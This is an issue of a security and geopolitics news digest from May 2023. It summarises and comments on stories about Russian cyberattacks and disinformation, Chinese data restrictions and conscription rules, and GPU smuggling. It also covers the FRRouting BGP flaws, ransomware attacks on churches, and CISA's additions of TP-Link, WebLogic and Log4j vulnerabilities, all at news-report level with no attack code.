Daily Drop (478): Russia attacks civilian infrastructure, Don’t Invest in China, The Fight Against Russia's Fake News, Smuggler busted heading for China, China updates military conscription laws
05-03-2023
Wednesday, May 03, 2023 // (IG): BB // Financial Enabler // Coffee for Bob
Ukrainian AI company raises $1 million to fight Russian propaganda
Analyst Comments: Osavul's focus on countering disinformation and its use of LLMs to analyze the information environment aligns with the growing concern about the spread of fake news and disinformation. The company's products could be valuable for organizations seeking to understand the potential impact of a specific narrative or threat, particularly in the context of geopolitical conflicts. However, the effectiveness of LLMs in detecting and countering disinformation remains a subject of debate, and it will be important for Osavul to demonstrate the effectiveness of its approach in order to gain traction in the market.
FROM THE MEDIA: Osavul, a startup focused on information security, countering disinformation, and assessing the information environment, has raised $1 million to integrate large language models (LLMs) into its platform. The Ukrainian company's products aim to help organizations understand if a specific narrative can be viewed as a threat, what its potential impact is, and how it spreads. The firm was launched in response to the Russian invasion of Ukraine and the subsequent wave of propaganda that discredited Ukraine and its allies. The platform will integrate LLM technologies to analyze the information environment, and Osavul's co-founder has warned of the increased risk of spreading misinformation with the emergence of new technologies, such as LLMs.
READ THE STORY: Cybernews
Russia attacks civilian infrastructure in cyberspace just as it does on the ground
Analyst Comments: The revelation that 90% of the members of hacker groups monitored by the Ukrainian Government are believed to be Russian military operatives is concerning. It highlights the ongoing cyber conflict between Russia and Ukraine, which has become a key part of the wider conflict between the two nations. The targeting of civilian infrastructure by Russian hackers is also a worrying trend, as it could have serious consequences for Ukraine’s economy and security. However, the fact that CERT-UA was able to repel and process 700 cyber incidents in just four months is a testament to the country’s cyber resilience and the effectiveness of its cybersecurity measures.
FROM THE MEDIA: The Government Cyber Emergency Response Team of Ukraine, CERT-UA, has revealed that it is monitoring the activities of over 80 hacking groups, the majority of which are from the Russian Federation, while 90% of their members are believed to be Russian military operatives. According to Volodymyr Kondrashov, the spokesman for the State Service of Special Communications and Information Protection, Russia is using the same tactics in cyberspace as it does on the conventional battlefield, attacking civilian infrastructure. In the first four months of 2023 alone, CERT-UA reportedly processed and repelled 700 cyber incidents, with a third of them being attacks on government bodies.
READ THE STORY: UKRINFORM
Don’t Bother Investing in China Unless You’re Chinese
Analyst Comments: China's decision to limit international access to its databases poses a challenge for global asset managers seeking to invest in the country's economy. This move is especially concerning given the historic fraud with Chinese companies listed on the Nasdaq. Access to basic information such as company ownership is becoming increasingly difficult for offshore investors, making it harder to gain insights into investment opportunities in China. A team of trusted analysts who are native Chinese may help investors bypass this information blackout, but investing in China from afar is becoming more challenging.
FROM THE MEDIA: China has been cutting off international access to various databases, including corporate registration, patents, and official statistical yearbooks. Shanghai-based Wind Information Co., a data platform widely used by traders, has recently cut off subscriptions for foreign think tanks and research firms due to "compliance" issues, which raises eyebrows. Wind provides real-time financial information and comprehensive databases on China's economy. The move seems limited to non-financial entities such as non-profit policy research outlets, and a good analyst can still get what they need. However, it has become increasingly difficult for people offshore to find out what China or its companies are up to, even for information as irrelevant to national security as company ownership.
READ THE STORY: Bloomberg
The Fight Against Russia's Fake News in Cuba
Analyst Comments: The information war between Russia and Ukraine is not new, but its impact on Caribbean nations is noteworthy. The use of state media to spread disinformation about the Ukraine conflict in other regions is also concerning. The alliance between Radio Marti and StopFake.org is a commendable effort to combat Kremlin propaganda, but the effectiveness of this initiative in getting the correct message to Cubans is still unclear. The fact that it is difficult to access Radio Marti's website in Cuba means that social media platforms like Facebook play an essential role in broadcasting the truth. The leaked U.S. intelligence documents that suggest Russia's disinformation campaigning is highly effective and that only a small fraction is detected by the West are concerning, and it is essential to continue efforts to counter disinformation campaigns.
FROM THE MEDIA: Russian state media is battling a fact-checking site from Kyiv in an information war over Ukraine in Caribbean nations. In Cuba, Kremlin-controlled media outlets such as Russia Today, Sputnik, and RIA-Novosti have been the main providers of news content on the war in Ukraine for the country's official press. The Russian versions of events in Ukraine are being picked up by media across Latin America, with Radio Marti, a sister media organization to VOA, attempting to offer Cubans a different version of the conflict. The media organization joined forces with StopFake.org, a Ukrainian fact-checking outlet to counter Spanish-language Russian propaganda in Cuba, Latin America, and Spain.
READ THE STORY: VOA
Smuggler busted heading for China with dodgy GPUs … and live lobsters
Analyst Comments: This incident highlights cross-border shenanigans in the Pearl River Delta and underscores how the US' export sanctions have given rise to "evasion routes" used to move forbidden tech across borders. Although the smuggled GPUs were outdated and not in demand among gamers or crypto miners, it is possible that they were being moved across the border for use in a Chinese AI project, which would be prohibited under US sanctions. Hong Kong authorities' commitment to crack down on such traffic should be appreciated.
FROM THE MEDIA: Hong Kong authorities intercepted a van carrying around 280 kilograms of live lobsters and 70 "high-value computer display cards" that were being smuggled into China. The goods, which were valued at around HK$600,000 ($76,500), were seized as the vehicle moved to enter the Hong Kong-Zhuhai-Macao Bridge. The display cards, which were sporting Nvidia's logo, were similar to the K2200, an outdated GPU that can now be purchased for $160. Hong Kong authorities have launched an investigation into the smuggling incident.
READ THE STORY: The Register
China updates military conscription rules with an eye on space, cyberwarfare
Analyst Comments: China's decision to allow former soldiers to reenlist and to increase investment in cyberwarfare and space expertise reflects President Xi Jinping's efforts to rapidly modernize and expand China's military capabilities. The revised conscription laws aim to increase troop numbers quickly by recruiting retired military members who will be given priority during recruitment and will likely re-enter their original unit. This move comes amid rising tension between China and the U.S. over Taiwan, with the U.S. lawmakers introducing a bill to boost cybersecurity collaboration with Taiwan. The Taiwan Cybersecurity Resiliency Act would require the U.S. Department of Defense to conduct cyber training exercises, defend Taiwan's military networks and infrastructure, and leverage U.S. cybersecurity technologies to help defend Taiwan. The lawmakers sponsoring the bill have noted that Taiwan faces millions of cyberattacks every month originating from China, some of which are later used against the United States.
FROM THE MEDIA: China has updated its conscription laws, allowing former soldiers to reenlist and prioritizing the recruitment of individuals with cyber and space expertise. The updated rules aim to increase troop numbers by recruiting retired military members and will focus on the country's expanding military capabilities. Chinese President Xi Jinping has pushed for the modernization of military theory, organizational forms, personnel, weaponry, and equipment, as well as enhancing the military's strategic capabilities to defend China's sovereignty, security, and development interests. The new regulations come as bipartisan lawmakers in the U.S. introduce a bill to boost cybersecurity collaboration with Taiwan to counter cyberattacks from China.
READ THE STORY: The Hill
North Korean factory poster urges cyber safety as country’s hacking threat grows
Analyst Comments: The North Korean regime has long viewed cyberspace as an important arena for global conflict and often accuses the US and its allies of mounting cyberattacks against the DPRK. Pyongyang may have a good reason for concern about cybersecurity threats, as foreign hackers have targeted critical infrastructure and virtual assets to finance the regime's nuclear and missile development. However, DPRK threat actors have also carried out cyberattacks, including targeting entities in the country. While the appearance of the cybersecurity poster may reflect an effort to improve basic cyber hygiene, the North Korean regime has been known to limit access to IT education and resources, making it uncertain how effective these efforts will be.
FROM THE MEDIA: North Korean state media aired a glimpse of domestic cybersecurity education in the country during a program about the Ryongsong Machine Complex in the northeastern city of Hamhung. A poster in the factory featured cybersecurity buzzwords and urged vigilance against malicious software, including spyware, adware, worms, and backdoors. While North Korean computer science is typically focused on top schools and elite institutions, basic IT literacy remains limited outside of these areas. The appearance of the cybersecurity poster may reflect Pyongyang's efforts to improve cyber hygiene domestically to protect key economic and military sites.
READ THE STORY: NK News
Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software
Analyst Comments: The discovery of vulnerabilities in BGP implementations poses a significant risk to the routing infrastructure of the internet, which is an essential component of the world's digital infrastructure. Attackers could exploit these vulnerabilities to achieve DoS conditions on vulnerable BGP peers, causing significant disruptions to internet traffic. Additionally, these vulnerabilities could be used by threat actors to spoof the IP addresses of trusted BGP peers or compromise legitimate peers, further expanding their attack surface. The fact that FRRouting is used by several vendors and organizations raises concerns about supply chain risk. The open-source BGP Fuzzer tool released by Forescout could help organizations detect vulnerabilities and improve their network infrastructure's security.
FROM THE MEDIA: Researchers from Forescout Vedere Labs have discovered vulnerabilities in version 8.4 of the FRRouting software implementation of the Border Gateway Protocol (BGP). The open-source internet routing protocol suite is used by several vendors, including NVIDIA Cumulus, DENT, and SONiC, posing a supply chain risk. The three vulnerabilities, CVE-2022-40302, CVE-2022-40318, and CVE-2022-43681, are out-of-bounds read issues and could be exploited to achieve a denial-of-service (DoS) condition on vulnerable BGP peers. An attacker could send a specially-crafted unsolicited BGP OPEN message to a legitimate peer after compromising it through flaws or misconfigurations. Forescout has also released a Python-based open-source BGP Fuzzer tool that allows organizations to test their BGP suites' security.
READ THE STORY: THN
Cybercrime groups find a new target: religious institutions
Analyst Comments: The recent attacks by LockBit and Karakurt against religious organizations in the United States underscore the increasing boldness of hacking groups and their willingness to target a wide range of institutions. Although religious institutions may not typically be considered high-value targets, they still handle sensitive data and may be vulnerable to cyberattacks. These attacks highlight the need for religious organizations, like all organizations, to take steps to protect their networks and sensitive data from cyber threats. The concrete ties between Karakurt and the Conti ransomware group show how cybercriminals are finding new ways to monetize data stolen during attacks in cases where organizations are able to block the ransomware encryption process.
FROM THE MEDIA: Two hacking groups, LockBit and Karakurt, have recently claimed attacks on religious organizations in the United States. LockBit targeted Relentless Church in South Carolina, a megachurch with more than 15,000 members, stealing employee data including passports and financial documents. Karakurt claimed to have attacked Our Sunday Visitor, a Catholic publishing company, and stolen 130 gigabytes of data, including accounting documents, HR information, and financial contracts. Although it is unusual for hackers to target religious institutions, some experts say that groups typically do not have rules against attacking them but that they may avoid doing so for PR purposes. Karakurt is an extortion group that eschews ransomware and relies solely on the theft of data. The group has concrete ties to the now-defunct ransomware gang Conti.
READ THE STORY: The Record
Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns
Analyst Comments: The inclusion of these three vulnerabilities on the CISA list is significant because they have either been actively exploited or have the potential to cause significant harm. The TP-Link flaw is especially concerning because the Mirai botnet, which is known for its large-scale network attacks, is already exploiting it. The fact that TP-Link has issued firmware to fix the issue is a positive sign, but the speed with which the flaw was exploited after the patch was released highlights the decreasing time between a vulnerability being found and exploitation attempts beginning. The Oracle WebLogic Server flaw, while not actively exploited at present, is easily exploitable and could allow an unauthenticated attacker to compromise the server and gain access to data on the system. The Log4j Java logging library flaw, while not as serious as the Log4j RCE vulnerability, could still lead to an RCE and information leak, making it a significant threat.
FROM THE MEDIA: The US Cybersecurity and Infrastructure Security Agency (CISA) has added three new flaws to its list of known vulnerabilities, including one that involves TP-Link routers being targeted by the Mirai botnet. The other two vulnerabilities on the list are related to Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The TP-Link flaw, tracked as CVE-2023-1389, enables hackers to inject commands that can lead to remote code execution, allowing the attacker to take control of the device from across the network or the internet. The Mirai botnet, which is known for large-scale network attacks, has already begun to exploit the flaw primarily by attacking devices in Eastern Europe, although the campaign soon expanded beyond that region. The Oracle WebLogic Server flaw, found in versions 12.2.1.2.0, 12.2.1.4.0, and 12.1.1.0.0, could allow an unauthenticated attacker who has network access to compromise the server and gain access to data on the system. The Log4j Java logging library flaw tracked as CVE-2021-45046, is an RCE flaw and is not the Log4j RCE vulnerability (dubbed Log4Shell and published as CVE-2021-44228), which was found around the same time.
READ THE STORY: The Register
Keep reading with a 7-day free trial
Subscribe to Bob’s Newsletter to keep reading this post and get 7 days of free access to the full post archives.